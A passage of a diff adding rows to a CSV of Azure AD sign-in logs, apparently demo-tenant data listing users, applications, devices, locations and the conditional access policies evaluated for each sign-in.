'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",cfab9824-c87d-41e8-8623-1f6da2641a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,cfab9824-c87d-41e8-8623-1f6da2641a00,SigninLogs,Sucess,50.6406517,5.572050095
+441,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1619c59-30d3-4fdc-aed3-5d79d01e72fd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",973ebc26-a5be-4a53-afb2-eb08fa6e1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,973ebc26-a5be-4a53-afb2-eb08fa6e1800,SigninLogs,Sucess,33.7984581,-84.38828278
+442,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae7c1b8a-f967-43d8-8712-31a4fea3747d,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",49d0cee2-6349-4d99-b7a5-a1e60d3a5800,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,49d0cee2-6349-4d99-b7a5-a1e60d3a5800,SigninLogs,Sucess,32.32146072,34.85319901
+443,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:27.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fdb46c0-57ed-4553-bee7-8264df0fed0f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e638d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,62115b57-0cb2-458e-8ba0-179e638d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+444,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:18.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f09eb4f5-09a8-4767-bcc0-95aac8c1089c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",24234731-7e74-417b-b5a0-a50f80f51900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,24234731-7e74-417b-b5a0-a50f80f51900,SigninLogs,Sucess,33.7984581,-84.38828278
+445,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:52,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 80.0.3987', 'displayName': 'ELABRAMO-LAP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",660b71b9-9c51-4814-a46b-358384744c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,660b71b9-9c51-4814-a46b-358384744c00,SigninLogs,Sucess,32.77729034,35.22056961
+446,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e49788d9-44f6-4ff5-a30c-7423c3917e00,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4fcd821c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,268d392c-7163-4a17-b774-5f4fcd821c00,SigninLogs,Sucess,33.7984581,-84.38828278
+447,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e2a0ac8c-bc54-4695-91b1-800234dc228d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4fde831c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,268d392c-7163-4a17-b774-5f4fde831c00,SigninLogs,Sucess,33.7984581,-84.38828278
+448,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:38.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9aa23ece-4e3a-4210-9a43-1483bc8302a4,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Visual Studio Code,aebc6443-996d-45c2-90f0-388ff96faa56,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 